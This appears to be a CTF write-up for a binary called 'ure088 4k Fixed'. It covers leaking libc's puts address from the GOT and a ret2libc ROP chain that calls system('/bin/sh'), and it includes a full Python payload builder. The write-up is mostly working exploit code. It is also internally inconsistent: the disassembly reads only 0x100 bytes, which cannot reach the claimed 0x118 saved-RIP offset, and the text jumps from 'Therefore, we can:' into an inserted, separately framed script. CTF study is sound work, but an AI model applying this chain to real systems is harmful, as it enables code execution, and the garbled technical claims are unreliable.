Ure088 4k Fixed -


Stage 1 – Leak

Read the "secret" the program prints: it is the raw bytes of the runtime address of puts, taken straight from the GOT. Subtracting the offset of puts inside the target's libc gives the libc base, and every other libc symbol (system, exit, the "/bin/sh" string libc carries) is at a fixed offset from that base.

Stage 2 – ROP

Overwrite the saved return address of main with a return-into-libc chain:

[ padding up to saved RIP ]   <-- buf is at rbp-0x110, so 0x110 bytes reach the saved rbp and 0x118 reach the saved RIP
[ RIP -> pop rdi ; ret ]      <-- gadget to control the first argument
[ address of "/bin/sh" ]      <-- the copy inside libc (found with strings -t x), or one placed in .bss / on the stack
[ system@libc ]               <-- system("/bin/sh") spawns the shell
[ (optional) exit@libc ]      <-- clean exit after the shell instead of a crash

Because the binary is non-PIE (it is dynamically linked against libc, but its own code sits at fixed addresses), the pop rdi ; ret gadget can be taken from the binary itself (e.g. at 0x4006a3 in this build) without waiting for the leak. Since pop rdi ; ret assembles to 5f c3, the byte at 0x4006a4 is a bare ret, which is handy for restoring 16-byte stack alignment before the call into system(): on x86-64 glibc, system() crashes in a movaps instruction if rsp is misaligned at its entry.

Running the binary locally gives the following interaction (the exact prompt may vary):

$ ./ure088
Welcome to the 4k fixed challenge!
Please enter your name:

After typing a name, the program prints:

Hello, <name>!
Here is your secret: <some string>

The "secret" is a leak of a libc address: as the disassembly below shows, the program prints the runtime address of puts straight out of the GOT. Once we know which libc the target runs, that single value gives the libc base and hence the addresses of system and exit.

Disassembly (relevant parts, IDA/Ghidra snippets)

0x004008f0 <main>:
    push    rbp
    mov     rbp, rsp
    sub     rsp, 0x120          ; reserve 0x120 (288) bytes on the stack
    lea     rsi, [rbp-0x110]    ; rsi = &buf (0x100 bytes, starting 0x110 below the saved rbp)
    mov     edx, 0x100          ; count = 256
    mov     edi, 0x0            ; fd 0 = stdin
    call    read                ; read(0, buf, 0x100); no NUL terminator is added
; ----  printf (buf is not NUL-terminated after a full 256-byte read, so %s can run past it)  ----
    lea     rdi, format_str     ; "Hello, %s!\n"
    lea     rsi, [rbp-0x110]    ; user supplied string
    xor     eax, eax            ; no vector registers used in the varargs call
    call    printf
; ----  secret leak  ----
    mov     rdi, stdout
    mov     rsi, offset puts_got ; 0x601018: address of the GOT slot for puts
    call    fprintf             ; the GOT slot itself is used as the format string:
                                ; prints the raw bytes of puts' *current* (runtime) address up to the first NUL
; exit
    mov     eax, 0
    leave
    ret

Observations

Because the binary is non-PIE, the GOT slot for puts is at a fixed address (0x601018 in this build). The value stored in that slot, however, is the address of puts inside libc, which ASLR relocates on every run, so the printed value differs between runs and between hosts. It is still exactly what we need: libc base = leaked puts address minus the offset of puts in the target's libc, and from the base every other libc symbol follows.

Therefore, we can:
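Both stages worked end to end, as an added example that is not the write-up's own exploit script. The GOT address, the gadget address and the frame layout come from the page; the libc offsets (LIBC_PUTS, LIBC_SYSTEM, LIBC_EXIT, LIBC_BINSH) are hypothetical placeholders that must be read from the target's libc, and the sample program output is constructed. The chain only makes sense against a process that still shares the leaked libc base (for example, the same forking service), since ASLR gives a fresh base to every new process.

```python
import struct

# Addresses taken from the write-up (non-PIE binary, fixed for every run).
PUTS_GOT = 0x601018          # GOT slot of puts
POP_RDI_RET = 0x4006a3       # pop rdi ; ret  (bytes 5f c3)
RET = POP_RDI_RET + 1        # the bare `ret` half of that gadget, used for stack alignment
RIP_OFFSET = 0x118           # buf at rbp-0x110: 0x110 bytes to saved rbp, 8 more to saved RIP

# Hypothetical libc offsets (NOT from the page). Read the real ones with
#   readelf -s libc.so.6 | grep -E ' (puts|system|exit)@@'
#   strings -t x libc.so.6 | grep /bin/sh
LIBC_PUTS = 0x80aa0
LIBC_SYSTEM = 0x4f440
LIBC_EXIT = 0x43120
LIBC_BINSH = 0x1b3e9a

SECRET_MARKER = b"Here is your secret: "


def p64(value: int) -> bytes:
    """Pack one 64-bit little-endian value for the stack."""
    return struct.pack("<Q", value)


def extract_secret(output: bytes) -> bytes:
    """Pull the leaked bytes out of the program's output.

    fprintf(stdout, (char *)&puts_got) writes the bytes of the GOT entry up to the
    first NUL. Those bytes may contain 0x0a, so do not split on newlines: take
    everything after the marker (the program exits right after printing it).
    """
    idx = output.find(SECRET_MARKER)
    if idx < 0:
        raise ValueError("secret marker not found in output")
    return output[idx + len(SECRET_MARKER):]


def parse_leak(secret: bytes) -> int:
    """Decode the raw little-endian address. The top bytes of a 0x7f... address
    are NUL and were swallowed by fprintf, so pad back out to 8 bytes."""
    if not 1 <= len(secret) <= 8:
        raise ValueError(f"unexpected leak length {len(secret)}")
    return struct.unpack("<Q", secret.ljust(8, b"\x00"))[0]


def libc_base(puts_addr: int) -> int:
    """libc base from the leaked puts address. glibc is mapped page aligned, so a
    misaligned result means LIBC_PUTS does not match the target's libc."""
    base = puts_addr - LIBC_PUTS
    if base & 0xFFF:
        raise ValueError("libc base not page aligned: wrong puts offset?")
    return base


def build_chain(base: int) -> bytes:
    """Stage 2 payload: padding, alignment ret, pop rdi ; ret, "/bin/sh", system, exit."""
    chain = b"A" * RIP_OFFSET
    chain += p64(RET)                  # keeps rsp 16-byte aligned at system()'s entry;
                                       # drop it if system() still faults in movaps
    chain += p64(POP_RDI_RET)
    chain += p64(base + LIBC_BINSH)    # rdi = "/bin/sh" (the copy inside libc)
    chain += p64(base + LIBC_SYSTEM)
    chain += p64(base + LIBC_EXIT)     # exit cleanly instead of crashing after the shell
    return chain


def exploit(stage1_output: bytes) -> bytes:
    """Stage 1 -> Stage 2: leaked bytes -> libc base -> payload."""
    return build_chain(libc_base(parse_leak(extract_secret(stage1_output))))


if __name__ == "__main__":
    # Constructed sample output, as the program would print it for a puts
    # address of 0x7f3a1c2c5aa0 (six non-NUL bytes, little-endian).
    sample = (b"Welcome to the 4k fixed challenge!\nPlease enter your name:\n"
              b"Hello, AAAA!\nHere is your secret: \xa0\x5a\x2c\x1c\x3a\x7f")
    base = libc_base(parse_leak(extract_secret(sample)))
    payload = exploit(sample)
    print(f"libc base: {base:#x}")
    print(f"payload: {len(payload)} bytes, first gadget at offset {RIP_OFFSET:#x}")
```

The alignment `ret` is the one part of the chain that depends on the real frame: if the target's rsp is already 16-byte aligned when `pop rdi ; ret` runs, the extra `ret` flips the parity the wrong way and `build_chain` should emit the chain without it. Verify the padding against the real binary with a cyclic pattern in gdb before trusting the 0x118 figure derived from the listing.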